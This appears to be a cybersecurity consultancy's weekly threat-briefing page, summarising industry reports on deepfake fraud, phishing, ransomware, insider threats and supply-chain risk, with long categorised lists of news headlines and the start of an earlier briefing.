Reports from the US National Security Agency, the Cybersecurity and Infrastructure Security Agency and the FBI highlight deepfake technology as a major concern because of the ready availability of AI tools. Deepfakes can replicate a person’s voice and likeness, making impersonations hard to detect; one company lost $25 million to deepfake fraud. Organisations are advised to put response plans in place, to adopt detection technologies as they become available and to agree shared phrases for validating identity, yet many still lack a comprehensive strategy, leaving them exposed to deepfake-enabled fraud and reputational damage.
Organisation Data on Dark Web Increases Cyber Attack Risk: Marsh McLennan
Searchlight Cyber and the Marsh McLennan Cyber Risk Intelligence Center have found that the presence of any data related to an organisation on the dark web significantly increases the risk of cyber attacks. Despite this, many organisations lack visibility into their dark web exposure. The report emphasises that proactively monitoring the dark web can enable organisations to adjust their defences and effectively stop attacks before they occur.
84 Percent of Enterprises Suffered Security Incidents in the Last Year
Netwrix research shows 84% of enterprises experienced cyber attacks in the past year, up from 65% in 2023. AI automation increases attack frequency and sophistication. Over half of large organisations faced unexpected expenses to fix security gaps. Additionally, 22% faced compliance fines, and 21% suffered reduced competitive edge. Nearly 30% estimate financial damage from cyber threats of at least $50,000.
It's Estimated That 91% of Cyber Attacks Begin with Phishing Emails
Phishing emails cause significant disruption, with 91% of cyber attacks starting this way. Larger companies are vulnerable to lateral phishing (from internal compromised email accounts), while smaller businesses face frequent external phishing and extortion schemes. Smaller businesses experience nearly three times more extortion attacks than larger firms. Many organisations lack tailored security measures to combat evolving email risks, highlighting the need to prioritise email security.
82% of Phishing Sites Now Target Mobile Devices
Zimperium’s 2024 zLabs Global Mobile Threat Report finds 82% of phishing sites target mobile devices, with 76% using HTTPS to appear secure. Unique malware samples increased by 13% year-on-year, with riskware and trojans making up 80% of threats. Healthcare is the most affected industry, with 39% of mobile threats from phishing. Sideloaded apps (installed on a device through unofficial means, bypassing the standard app store) pose significant risks, especially in financial services where 68% of threats are linked to them. Advanced security solutions are essential to protect mobile endpoints.
UK Firms Are Dangerously Overconfident About Paying Ransoms to Cyber Criminals
Cohesity found that ransomware is a top concern for UK organisations, with over half experiencing attacks in 2023. Three-quarters would pay a ransom to recover data, despite only 4% fully recovering after payment. Costs averaged £870,000 per incident, with some reaching £20 million. Fewer than 2% restored operations within 24 hours, and one in five took up to two months. This highlights the need for resilience and robust recovery processes over ransom payments.
Preparing To Fail is a Vital Part of Cyber Security
The UK Government reports that 50% of businesses suffered cyber attacks in 2023. The Synnovis ransomware attack disrupted NHS services and showed how unprepared organisations are for worst-case scenarios, including incidents that originate with a supplier they depend on. Few organisations plan for high-impact risks or supply chain attacks. The report stresses the need for pre-assigned roles and responsibilities so that remediation can begin immediately. Preparing for the most damaging incidents is essential for organisational survival.
Over a Third of Employees Secretly Sharing Work Info with AI
CybSafe and the National Cyber Security Alliance found that employees sharing sensitive work information with AI tools without permission is a major concern. The behaviour is most prevalent among Gen Z (46%) and millennials (43%). Despite awareness of AI risks, over half of employees have had no training on safe AI use. Two-thirds of survey respondents worry that AI will make scams harder to detect and increase cyber crime, and 35% express low trust in how companies are implementing AI. Organisations need training and robust policies to mitigate AI-related risks.
Fortifying the Weakest Link: How to Safeguard Against Supply Chain Cyber Attacks
Recent incidents have highlighted that vulnerabilities in widely-used IT and security tools are a top concern for organisations, with supply chain cyber attacks rising significantly between 2022 and 2023. Despite strengthening direct network defences, many organisations have yet to safeguard against third-party control failures. Key strategies include advanced supplier risk management, securing the software development pipeline, and implementing strong access controls. Adopting frameworks like the NIST cyber security framework and incorporating cyber security requirements into vendor contracts are essential. Without proactive measures, organisations remain vulnerable to significant reputational and operational damage from supply chain cyber attacks.
Underfunding and Leadership Gaps Weaken Cyber Security Defences
Trend Micro found that cyber security threats are the top concern for organisations, but many lack strategic leadership and investment. With 96% of IT leaders worried about the expanding attack surface, the report noted that, despite Trend Micro blocking 161 billion threats in 2023 (a 10% increase on the previous year), nearly half of respondents said their leadership did not consider cyber security to be their responsibility. Only 36% can afford 24/7 coverage, leading to fragmented approaches. Over half believe their organisation’s attitude towards cyber security varies from month to month, highlighting inconsistency in risk management. Cyber security is a boardroom issue, and neglecting it could have disastrous consequences.
Racist Network Rail Wi-Fi Hack was Work of Malicious Insider
A cyber attack on public Wi-Fi at 19 UK railway stations on 25 September blocked passengers from using the service: those who tried to connect were shown racist and Islamophobic messages instead of the landing page. The British Transport Police arrested an employee of GlobalReach Technology, the Wi-Fi provider, on suspicion of involvement. Although no personal data was compromised, the incident underscores the significant risk posed by malicious insiders. Telent, responsible for the network, aims to restore services by the weekend. This event highlights the need for robust insider threat mitigation strategies.
Sources:
https://www.jdsupra.com/legalnews/preparing-for-the-cybersecurity-and-3002248/
https://hackernoon.com/its-estimated-that-91percent-of-cyber-attacks-begin-with-phishing-emails
https://www.infosecurity-magazine.com/news/82-phishing-target-mobile-devices/
https://www.infosecurity-magazine.com/news/third-employees-sharing-work-info/
https://informationsecuritybuzz.com/underfunding-and-leadership-gaps-weaken-cybersecurity-defenses/
Governance, Risk and Compliance
84 percent of enterprises suffered security incidents in the last year (betanews.com)
AI threats pushing cyber pros to seek legal safeguards | Cybernews
Preparing to fail is a vital part of cyber security - Ian McGowan (scotsman.com)
AI Adoption Set to Unravel Years of Cyber Resilience - IT Security Guru
Brands are changing cyber security strategies due to AI threats (securityintelligence.com)
Underfunding And Leadership Gaps Weaken Cyber Security Defences (informationsecuritybuzz.com)
How Cyber-Risk & Business Risk Are the Same (darkreading.com)
Cyber threats top the 2024 Travelers Risk Index, fourth time in six years - Reinsurance News
New cyber security advisory highlights defence-in-depth strategies (securityintelligence.com)
How cyber compliance helps minimize the risk of ransomware infections - Help Net Security
What to do - and not to do - when you suffer a cyber-attack (businesscloud.co.uk)
Reporting cyber security posture and systemic risk to the board | CIO
How to give cyber security the priority treatment it deserves (moneymarketing.co.uk)
Balancing Risk and Innovation - A CISO Perspective | Security Magazine
Digital security is everyone's concern – Daily Business Magazine (dailybusinessgroup.co.uk)
Are You Sabotaging Your Cyber Security Posture? - Security Boulevard
Round-the-Clock Cyber Coverage Lacking in Many Orgs | MSSP Alert
Threats
Ransomware, Extortion and Destructive Attacks
Companies Often Pay Ransomware Attackers Multiple Times - Security Boulevard
Cyber security experts urge a stronger security posture in response to AI attacks - SiliconANGLE
ENISA Warns About Hacktivist, Ransomware Crossover (databreachtoday.co.uk)
UK firms are dangerously overconfident about paying ransoms to cyber criminals | ITPro
MFA bypass becomes a critical security issue as ransomware tactics advance - Help Net Security
Ransomware Task Force finds 73% attack increase in 2023 | TechTarget
How cyber compliance helps minimize the risk of ransomware infections - Help Net Security
Warnings After New Valencia Ransomware Group Strikes Businesses and Leaks Data | Tripwire
Two-Thirds of Healthcare Organisations Hit by Ransomware – (globenewswire.com)
Ransomware Victims
ICO Fine Software Provider £6M Following Ransomware Attack (nelsonslaw.co.uk)
Two-Thirds of Healthcare Organisations Hit by Ransomware – (globenewswire.com)
Cyber attack could cost Western Isles council more than £1m - BBC News
Lancaster Royal Grammar targeted by cyber ransom hackers - BBC News
AutoCanada says ransomware attack "may" impact employee data (bleepingcomputer.com)
US government agency confirms it was hit by major ransomware attack | TechRadar
Delaware Libraries confirms RansomHub cyber attack • The Register
Phishing & Email Based Attacks
It's Estimated That 91% Of Cyber Attacks Begin With Phishing Emails | HackerNoon
Phishing and deepfakes are leading AI-powered threats (betanews.com)
82% of Phishing Sites Now Target Mobile Devices - Infosecurity Magazine (infosecurity-magazine.com)
Enterprises suffer surge in mobile phishing attacks (betanews.com)
Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials (thehackernews.com)
This Phishing Service Helped Criminals Break Into 1 Million+ Stolen Phones (pcmag.com)
Marko Polo hackers found to be running dozens of scams | SC Media (scmagazine.com)
One quarter of small business owners have been targeted by AI-driven scams (prnewswire.com)
75% of organisations say phishing poses the greatest AI risk | Security Magazine
Microsoft 365 Credentials Targeted by TikTok URL-Based Phishing | MSSP Alert
Other Social Engineering
Beware: fraud and smishing scams targeting students | Bournemouth University
US indicts two over socially engineered $230M+ crypto heist • The Register
How to Stop Getting Spam Calls? This Expert Weighs In. (dailydot.com)
Artificial Intelligence
These Are Cyber Chiefs' Biggest Fears About AI (investopedia.com)
Phishing and deepfakes are leading AI-powered threats (betanews.com)
AI threats pushing cyber pros to seek legal safeguards | Cybernews
AI Adoption Set to Unravel Years of Cyber Resilience - IT Security Guru
Brands are changing cybersecurity strategies due to AI threats (securityintelligence.com)
Less Than Half of AI Users Trained on Security and (globenewswire.com)
HackerOne: 48% of Security Professionals Believe AI Is Risky (techrepublic.com)
Hackers deploy AI-written malware in targeted attacks (bleepingcomputer.com)
One quarter of small business owners have been targeted by AI-driven scams (prnewswire.com)
Hacker plants false memories in ChatGPT to steal user data in perpetuity | Ars Technica
Are new gen AI tools putting your business at additional risk? (securityintelligence.com)
SANS Institute: Top 5 dangerous cyber attack techniques in 2024 (securityintelligence.com)
LinkedIn Halts AI Data Processing in UK Amid Privacy Concerns Raised by ICO (thehackernews.com)
Police are using AI to write crime reports. What could go wrong? | ZDNET
2FA/MFA
MFA bypass becomes a critical security issue as ransomware tactics advance - Help Net Security
New Chrome Alert After Hackers Claim 2FA Security Cracked In 10 Minutes (forbes.com)
Malware
AI’s Influence on Malware Attacks Tops IT Pros’ Concerns | MSSP Alert
Unique malware sample volumes seen surging | Computer Weekly
New MacOS Malware Let Attackers Control The Device Remotely (cybersecuritynews.com)
HP Spots a Malware Attack That Was Likely Built With Generative AI (pcmag.com)
RomCom Malware Resurfaces With SnipBot Variant (darkreading.com)
Infostealer malware bypasses Chrome’s new cookie-theft defences (bleepingcomputer.com)
This Windows malware is now evolving to target Linux systems | TechRadar
Move over, Cobalt Strike, there's a new post-exploit tool • The Register
Global infostealer malware operation targets crypto users, gamers (bleepingcomputer.com)
New PondRAT Malware Hidden in Python Packages Targets Software Developers (thehackernews.com)
Russia clings to malware as attacks on Ukraine persist • The Register
Bots/Botnets
65% of websites are unprotected against simple bot attacks - Help Net Security
Mobile
82% of Phishing Sites Now Target Mobile Devices - Infosecurity Magazine (infosecurity-magazine.com)
Mobile Phishing Attacks Targeting Enterprises Surge, Zimperium Researchers Find (prnewswire.com)
The NSA advises you to turn off your phone once a week - here's why | ZDNET
Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials (thehackernews.com)
New Octo Android malware version impersonates NordVPN, Google Chrome (bleepingcomputer.com)
This Phishing Service Helped Criminals Break Into 1 Million+ Stolen Phones (pcmag.com)
New Android banking trojan Octo2 targets European banks (securityaffairs.com)
Victims lose $70k to Play Store wallet-draining app • The Register
Opinion | Israel’s Pager Attacks Have Changed the World - The New York Times (nytimes.com)
How Digital Forensics Experts Read Your Encrypted WhatsApp Messages (forbes.com)
Denial of Service/DoS/DDoS
DDoS overtakes ransomware as most active cyber threat in Europe | Cybernews
Austria subjected to pro-Russian DDoS intrusions | SC Media (scworld.com)
Internet of Things – IoT
3 tips for securing IoT devices in a connected world - Help Net Security
Hacking Kia cars made after 2013 using just their license plate (securityaffairs.com)
Data Breaches/Leaks
TfL sends letters to 5,000 cyber attack customers whose details were hacked | Evening Standard
'Harvest now, decrypt later': Why hackers are waiting for quantum computing | VentureBeat
Dell's Security Woes Deepen: Attackers Strike Twice In One Week (informationsecuritybuzz.com)
Harvey Nichols confirms cyber attack, says customer data leaked | TechRadar
Twilio Call Data Exposed | MSSP Alert
Over 90 million French records exposed: mysterious data hoarder leaves instances open | Cybernews
Data of 3,191 congressional staffers leaked in the dark web (securityaffairs.com)
Threat Actor IntelBroker Allegedly Claims Leak of Deloitte Data (cybersecuritynews.com)
US Capitol Hit by Massive Dark Web Cyber Attack - Newsweek
Hacker uses Telegram chatbots to leak data - Security - iTnews
AutoCanada says ransomware attack "may" impact employee data (bleepingcomputer.com)
Organised Crime & Criminal Actors
ENISA Warns About Hacktivist, Ransomware Crossover (databreachtoday.co.uk)
Why so many hackers are Russian | Cybernews
Why so many hackers are Russian: Vol 2 | Cybernews
Life imitates xkcd comic as Florida gang beats crypto password from retiree | Ars Technica
Cybersecurity Experts Closing in on Ticketmaster Hacker (digitalmusicnews.com)
Risk & Repeat: What's next for Telegram and Pavel Durov? | TechTarget
Telegram CEO Pavel Durov will hand over data to government (nypost.com)
Shocking poll: Half the world has fallen victim to cyber attacks (studyfinds.org)
Why Russia is a Hotbed of Cyber Crime | Intel471
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Life imitates xkcd comic as Florida gang beats crypto password from retiree | Ars Technica
Hackers stole over $44 million from Asian crypto platform BingX (securityaffairs.com)
Marko Polo hackers found to be running dozens of scams | SC Media (scmagazine.com)
An official OpenAI X account just got hacked by crypto scammers | Mashable
US indicts two over socially engineered $230M+ crypto heist • The Register
Global infostealer malware operation targets crypto users, gamers (bleepingcomputer.com)
Insider Risk and Insider Threats
Racist Network Rail Wi-Fi hack was work of malicious insider | Computer Weekly
Mandiant gives tips on catching North Korean IT operatives • The Register
The Importance of Cyber Security Awareness and Insider Threat Management - Security Boulevard
Why insider threats are cyber security’s next big challenge - Hindustan Times
Insurance
Cyber insurance price hikes stabilize as insurers expect more from CISOs | CSO Online
The surge in cyber insurance and what it means for your business - Help Net Security
Cyber Insurers Owe Millions for Attack, Transcription Firm Says (bloomberglaw.com)
Supply Chain and Third Parties
China's 'Salt Typhoon' Cooks Up Cyber Attacks on US ISPs (darkreading.com)
Cyber security: Remember, We Are All Connected (epsnews.com)
Evaluating embedded vulnerabilities and cyber security risks in procurement | TechRadar
CrowdStrike to Congress: 'Perfect storm' led to IT outage • The Register
Fortifying the Weakest Link: How to Safeguard Against Supply Chain Cyber Attacks - SecurityWeek
Cloud/SaaS
AWS says customers are turning back to on-prem | TechRadar
Microsoft Trims Cloud Cyber Attack Surface (darkreading.com)
Microsoft 365 Credentials Targeted by TikTok URL-Based Phishing | MSSP Alert
Ivanti's Cloud Service Attacked via Second Vuln (darkreading.com)
Outages
'Cyber security issue' blamed for MoneyGram's ongoing outage • The Register
CrowdStrike exec to apologize for faulty update that caused global IT outage (yahoo.com)
CrowdStrike to Congress: 'Perfect storm' led to IT outage • The Register
Identity and Access Management
Securing non-human identities: Why fragmented strategies fail - Help Net Security
Active Directory compromise: Cyber security agencies provide guidance - Help Net Security
Encryption
How to prepare for post-quantum computing security | TechTarget
'Harvest now, decrypt later': Why hackers are waiting for quantum computing | VentureBeat
G7 Cyber Expert Group warns financial sector of quantum computing | SC Media (scworld.com)
How Digital Forensics Experts Read Your Encrypted WhatsApp Messages (forbes.com)
Linux and Open Source
Doomsday 9.9 unauthenticated RCE bug affects 'all Linux' • The Register
Printer bug sends researchers into uproar, affects major Linux distros | CyberScoop
This Windows malware is now evolving to target Linux systems | TechRadar
New Mallox ransomware Linux variant based on leaked Kryptina code (bleepingcomputer.com)
Paid open-source maintainers spend more time on security - Help Net Security
FreeBSD Hypervisor Vulnerability Lets Attackers Execute Malicious Code (cybersecuritynews.com)
Passwords, Credential Stuffing & Brute Force Attacks
Why You Need a Longer Password (howtogeek.com)
Public Sector Compliance: Passwords and Credentials Matter - Security Boulevard
Social Media
Microsoft 365 Credentials Targeted by TikTok URL-Based Phishing | MSSP Alert
An official OpenAI X account just got hacked by crypto scammers | Mashable
LinkedIn Halts AI Data Processing in UK Amid Privacy Concerns Raised by ICO (thehackernews.com)
42% of daily X users have a negative view of it - losing the block feature won't help | ZDNET
X's first transparency report since Musk reveals a surprising contradiction | ZDNET
Training, Education and Awareness
STUDY: Less Than Half of AI Users Trained on Security and (globenewswire.com)
Combating phishing attacks through awareness and simulation | Cybernews
The Importance of Cyber Security Awareness and Insider Threat Management - Security Boulevard
Regulations, Fines and Legislation
ICO Fine Software Provider £6M Following Ransomware Attack (nelsonslaw.co.uk)
Rethinking the United Nations Cybercrime Treaty (justsecurity.org)
Cyber Security | UK Regulatory Outlook September 2024 - Osborne Clarke | Osborne Clarke
UK government's bank data sharing plan blasted by critics • The Register
Models, Frameworks and Standards
New NIST program focuses on AI cyber security and privacy | SC Media (scmagazine.com)
Backup and Recovery
Isolated Cyber Vaults: The last line of defence against billions of attacks | TechRadar
Data Protection
LinkedIn Halts AI Data Processing in UK Amid Privacy Concerns Raised by ICO (thehackernews.com)
Careers, Working in Cyber and Information Security
It’s Never Too Late: Transitioning to a Career in Cyber Security - IT Security Guru
Future-proofing cyber security: Why talent development is key - Help Net Security
Round-the-Clock Cyber Coverage Lacking in Many Orgs | MSSP Alert
Law Enforcement Action and Take Downs
Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials (thehackernews.com)
This Phishing Service Helped Criminals Break Into 1 Million+ Stolen Phones (pcmag.com)
Telegram Agrees to Share User Data with Authorities for Criminal Investigations (thehackernews.com)
US indicts two over socially engineered $230M+ crypto heist • The Register
Risk & Repeat: What's next for Telegram and Pavel Durov? | TechTarget
Telegram CEO Pavel Durov will hand over data to government (nypost.com)
FBI raids government IT and cyber contractor Carahsoft - Nextgov/FCW
Misinformation, Disinformation and Propaganda
Fake UK news sites ‘spreading false stories’ about western firms in Ukraine | Russia | The Guardian
How Russia, China & Iran Are Targeting US Elections (darkreading.com)
China are the real hackers not us, Taiwan says after cyber accusations, Asia News - AsiaOne
Iranian-linked election interference operation shows signs of recent access | CyberScoop
Officials: Fake Kamala Harris Videos Part of Russian Influence Operations | MSSP Alert
China urges vigilance against Taiwanese cyber attacks - CNA (channelnewsasia.com)
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Developing an effective cyber warfare response plan - Help Net Security
Volt Typhoon: The real end game of evolving nation-state threats - SiliconANGLE
The Supply Chain Conspiracy: Cyber Attacks Behind the Lebanon Explosions - Security Boulevard
Nation State Actors
Bulk of data centre cyber attacks coming from hostile states, warn EU experts (irishexaminer.com)
How Russia, China & Iran Are Targeting US Elections (darkreading.com)
China
US ISPs targeted by new Chinese cyber espionage gang | SC Media (scworld.com)
China's Salt Typhoon cyber spies spotted deep inside US ISPs • The Register
Chinese hackers allegedly hacked US ISPs for cyber espionage | CSO Online
Noise Storms: Massive Amounts of Spoofed Web Traffic Linked to China - SecurityWeek
China's 'Salt Typhoon' Cooks Up Cyber Attacks on US ISPs (darkreading.com)
Chinese APT Earth Baxia target APAC by exploiting GeoServer flaw (securityaffairs.com)
Noise Storms: Mysterious massive waves of spoofed traffic observed since 2020 (securityaffairs.com)
China are the real hackers not us, Taiwan says after cyber accusations, Asia News - AsiaOne
China urges vigilance against Taiwanese cyber attacks - CNA (channelnewsasia.com)
Russia
Fake UK news sites ‘spreading false stories’ about western firms in Ukraine | Russia | The Guardian
Russia-backed Gamaredon still ‘most engaged’ hacker group in Ukraine (therecord.media)
Ukraine sees shift in Russian hacking tactics: more widespread, less severe | Cybernews
Officials: Fake Kamala Harris Videos Part of Russian Influence Operations | MSSP Alert
Why so many hackers are Russian | Cybernews
Why so many hackers are Russian: Vol 2 | Cybernews
Russia clings to malware as attacks on Ukraine persist • The Register
Why Russia is a Hotbed of Cyber Crime | Intel471
Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks (thehackernews.com)
Kaspersky deletes itself, installs UltraAV antivirus without warning (bleepingcomputer.com)
Austria subjected to pro-Russian DDoS intrusions | SC Media (scworld.com)
Iran
UNC1860 provides Iran-linked APTs with access to Middle Eastern networks (securityaffairs.com)
Bulk of data centre cyber attacks coming from hostile states, warn EU experts (irishexaminer.com)
Concealed Fox Kitten infrastructure exposed | SC Media (scworld.com)
Sweden blames Iran for cyber-attack after Quran-burnings - BBC News
Iranian-linked election interference operation shows signs of recent access | CyberScoop
North Korea
Mandiant gives tips on catching North Korean IT operatives • The Register
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Did Israel infiltrate Lebanese telecoms networks? (securityaffairs.com)
ENISA Warns About Hacktivist, Ransomware Crossover (databreachtoday.co.uk)
Tools and Controls
Preparing to fail is a vital part of cyber security - Ian McGowan (scotsman.com)
AI Adoption Set to Unravel Years of Cyber Resilience - IT Security Guru
Less Than Half of AI Users Trained on Security and (globenewswire.com)
MFA bypass becomes a critical security issue as ransomware tactics advance - Help Net Security
Cloud Exit: 42% of Companies Move Data Back On-Premises - Techopedia
Why threat intelligence is essential to consolidated security | SC Media (scmagazine.com)
Mastercard's Bet on Recorded Future a Win for CTI (darkreading.com)
New cyber security advisory highlights defence-in-depth strategies (securityintelligence.com)
Combating phishing attacks through awareness and simulation | Cybernews
Developing an effective cyber warfare response plan - Help Net Security
Active Directory compromise: Cyber Security agencies provide guidance - Help Net Security
Keep Tier-One Applications Out of Virtual Environments (darkreading.com)
Boredom Is the Silent Killer in Your IT Systems (darkreading.com)
When technical debt strikes the security stack | CSO Online
What Does Platformization Mean for MSSPs and MDRs? | MSSP Alert
What Is Cyber Threat Hunting? (techrepublic.com)
Bulk of data centre cyber attacks coming from hostile states, warn EU experts (irishexaminer.com)
65% of websites are unprotected against simple bot attacks - Help Net Security
CrowdStrike exec to apologize for faulty update that caused global IT outage (yahoo.com)
Securing non-human identities: Why fragmented strategies fail - Help Net Security
Kaspersky users shocked by automatic antivirus replacement without explicit permission | Cybernews
Offensive cyber operations are more than just attacks - Help Net Security
Privacy And API Security: What’s At Stake? (informationsecuritybuzz.com)
How automated red teaming can improve your cyber security | Tech Donut
Move over, Cobalt Strike, there's a new post-exploit tool • The Register
Other News
Small doesn’t mean safe: how SMEs are under attack (smh.com.au)
Digital security is everyone's concern – Daily Business Magazine (dailybusinessgroup.co.uk)
Microsoft Trims Cloud Cyber Attack Surface (darkreading.com)
How Microsoft Is Beefing Up Security With 34,000 Engineers (databreachtoday.co.uk)
Microsoft CEO to cyber team: Don’t tell me how great everything is | The Seattle Times
Are You Sabotaging Your Cyber Security Posture? - Security Boulevard
Cyber security threats target healthcare - SiliconANGLE
ISO - Healthcare cyber security: Diagnosing risks, prescribing solutions
5 Cyber Security Threats Every Startup Should Know | LevelBlue (att.com)
Google, Apple and the antitrust tipping point (ft.com)
10 security bugs put fuel storage tanks at risk of attacks • The Register
6 Cyber Security Headaches Sporting Events Suffer (darkreading.com)
A lesson in cyber threats: Building resilient networks in education | theHRD (thehrdirector.com)
Vulnerability Management
Microsoft ends development of Windows Server Update Services (WSUS) (bleepingcomputer.com)
Windows Server 2025 gets hotpatching option, without reboots - Help Net Security
Boredom Is the Silent Killer in Your IT Systems (darkreading.com)
When technical debt strikes the security stack | CSO Online
EPSS vs. CVSS: What's the Best Approach to Vulnerability Prioritization? (thehackernews.com)
60% of vulnerabilities were leveraged against Microsoft Exchange | Security Magazine
Vulnerabilities
Zero-Click MediaTek Bug Opens Phones, Wi-Fi to Takeover (darkreading.com)
Doomsday 9.9 unauthenticated RCE bug affects 'all Linux' • The Register
Critical Linux bug is CUPS-based remote-code execution hole • The Register
Cisco Patches High-Severity Vulnerabilities in IOS Software - SecurityWeek
Critical Ivanti vTM auth bypass bug now exploited in attacks (bleepingcomputer.com)
Third Recent Ivanti Vulnerability Exploited in the Wild - SecurityWeek
Citrix Releases Security Updates for XenServer and Citrix Hypervisor | CISA
HPE patches three critical flaws in Aruba software • The Register
Researcher reveals ‘catastrophic’ security flaw in the Arc browser - The Verge
Versa Networks Releases Advisory for a Vulnerability in Versa Director, CVE-2024-45229 | CISA
CERT/CC Warns of Unpatched Critical Vulnerability in Microchip ASF - SecurityWeek
ESET Patches Privilege Escalation Vulnerabilities in Windows, macOS Products - SecurityWeek
FreeBSD Hypervisor Vulnerability Lets Attackers Execute Malicious Code (cybersecuritynews.com)
60% of vulnerabilities were leveraged against Microsoft Exchange | Security Magazine
Sector Specific
Industry-specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Black Arrow Cyber Threat Briefing 20 September 2024
Black Arrow Cyber Threat Intelligence Briefing 20 September 2024:
-Cyber Threats and AI Disruption Top Business Risks for 2024
-Half of UK Firms Lack Basic Cyber Security Skills
-Beyond A Buzzword: What Resilience in Cyber Really Means
-Do Boards Understand Their New Role in Cyber Security?
-All Smoke, No Fire: The Bizarre Trend of Fake Data Breaches and How to Protect Against Them
-Threat Actors Continue to Utilise HR-Related Phishing Tactics
-80% of Organisations Experienced an Email-Related Security Breach in the Last Year
-The Growing Danger of Visual Hacking and How to Protect Against It
-Cyber Warfare: A Growing Concern for the British Public
-The Rising Cost of Vulnerable APIs and Bot Attacks – A $186 Billion Wake-Up Call for Businesses
-Attackers are Exploiting Vulnerabilities at a Record Pace—Here’s What to Do About It
-What Can Businesses Learn from the Rise of Cyber Espionage?
-When Startup Founders Should Start Thinking About Cyber Security
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Cyber Threats and AI Disruption Top Business Risks for 2024
Global law firm Clyde & Co's latest corporate risk radar report highlights that 76% of business leaders now view cyber threats as their primary technological concern. Regulatory scrutiny is considered a growing operational threat by 43% of leaders, due to an influx of new initiatives and inconsistent regulations. People-related challenges rank as the second-highest impact risk, identified by 58% of leaders as a threat to multinational operations. Notably, climate change has dropped from sixth to ninth in the global risk hierarchy, reflecting the increased urgency of other issues. Additionally, 29% of business leaders have identified disruption caused by artificial intelligence as a significant high-impact risk for the first time. The report emphasises the need for comprehensive risk planning and employee training to enhance security and resilience in today's volatile environment.
Half of UK Firms Lack Basic Cyber Security Skills
Recent government findings indicate that 44% of UK businesses have skills gaps in basic technical cyber security areas. Among the 637,000 businesses examined, 27% lack advanced skills such as penetration testing. Incident management skills gaps have risen sharply from 27% in 2020 to 48% in 2024. The Department for Science, Innovation & Technology (DSIT) reported that despite increased supply, a significant skills gap persists. Nearly half of businesses that do not outsource incident management are not confident in handling a cyber security breach. Employers and recruiters also believe that AI will impact the cyber skills landscape, potentially leading to job losses due to automation and a need for new skills to work with AI tools.
Beyond A Buzzword: What Resilience in Cyber Really Means
Cyber resilience is now essential for organisations of all sizes, as cyber attacks have become inevitable. Resilience involves not only preventing breaches but also minimising damage and swiftly restoring operations, requiring a shift towards adaptive threat management with quick detection and response. This year’s International Cyber Expo Global Cyber Summit highlighted that leaders are focusing on integrating employees into security frameworks and policies, as well as fostering a supportive work environment to prevent burnout among cyber security professionals. Diversity and community were noted as key factors in building resilient teams capable of innovative problem-solving. Achieving true cyber resilience is a balancing act between protecting organisational assets and ensuring the wellbeing of the workforce.
Do Boards Understand Their New Role in Cyber Security?
Research reveals that over 90% of cyber security incidents originate from human action, underscoring the critical role of boards in governing cyber security risk. However, many board members view cyber security as a purely technical issue, overly focusing on tools rather than strategic oversight. Boards are encouraged to upskill on cyber risks, strategically prioritising investments and understanding their roles in incident response. Boards are advised to seek external assessments of their cyber recovery plans, much like financial audits, to enhance preparedness. Additionally, boards are adjusting member selection criteria to include technology expertise that addresses both security and strategic opportunities. Understanding that technology safeguards critical data and automates business processes, boards must integrate cyber security into their core business strategy.
All Smoke, No Fire: The Bizarre Trend of Fake Data Breaches and How to Protect Against Them
Organisations are increasingly facing fake data breach claims from cyber criminals, causing unnecessary panic and resource diversion. These hoaxes can damage a company's reputation and erode customer trust, even when no actual breach has occurred. Experts advise implementing advanced security measures and establishing dedicated teams to verify breach claims before reacting publicly. Effective communication strategies are crucial to manage public perception and maintain control over the narrative. Continuous employee training and updated security protocols are essential to mitigate both real and fake cyber threats, safeguarding the organisation's reputation and customer confidence.
Threat Actors Continue to Utilise HR-Related Phishing Tactics
Phishing attacks are becoming increasingly sophisticated, with recent tactics continuing the trend of impersonating company HR departments to deceive employees. One notable campaign sent emails urging staff to review a revised employee handbook, using professional language and creating a sense of urgency to prompt immediate action. These emails directed recipients to fake login pages designed to capture sensitive credentials. Such attacks exploit trust and fear of non-compliance, emphasising the need for robust cyber security measures. Organisations are advised to implement advanced email security solutions and enhance user awareness training. A multi-layered defence approach, combining technology and vigilant employees, is essential to protect against these evolving phishing threats.
Report: 80% of Organisations Experienced an Email-Related Security Breach in the Last Year
The latest report from a cyber security solutions provider reveals that email-related threats are a top concern for critical infrastructure organisations. The study found that 80% of these entities experienced an email-related security breach in the past year, and 63% admit their email security needs improvement. Despite advancements in cyber security, nearly half of the organisations lack confidence in their current email defences, leaving them vulnerable to cyber attacks. 65% are not compliant with regulatory standards, exposing them to significant operational and business risks. The report highlighted that essential security measures like Content Disarm and Reconstruction (CDR) and URL scanning are missing in many organisations' defences. This underscores the urgent need to adopt a zero-trust mindset and strengthen prevention-based perimeter defence strategies.
The Growing Danger of Visual Hacking and How to Protect Against It
Visual hacking is a significant threat that many organisations overlook in their data security strategies. Despite focusing on cyber security within systems, physical methods like shoulder surfing can bypass these defences, exposing sensitive information. Physical barriers such as privacy screens are highly effective, blocking up to 99.8% of visible light at angles beyond 45 degrees, ensuring only the primary user can view the screen. Traditional privacy screens have drawbacks like increased device thickness and permanent privacy modes, impacting usability. Switchable privacy screens built into devices are gaining popularity, offering automated and software-controlled privacy without hindering functionality. Organisations are advised to adopt these advanced privacy measures to prevent unauthorised visual access and enhance overall data security.
Cyber Warfare: A Growing Concern for the British Public
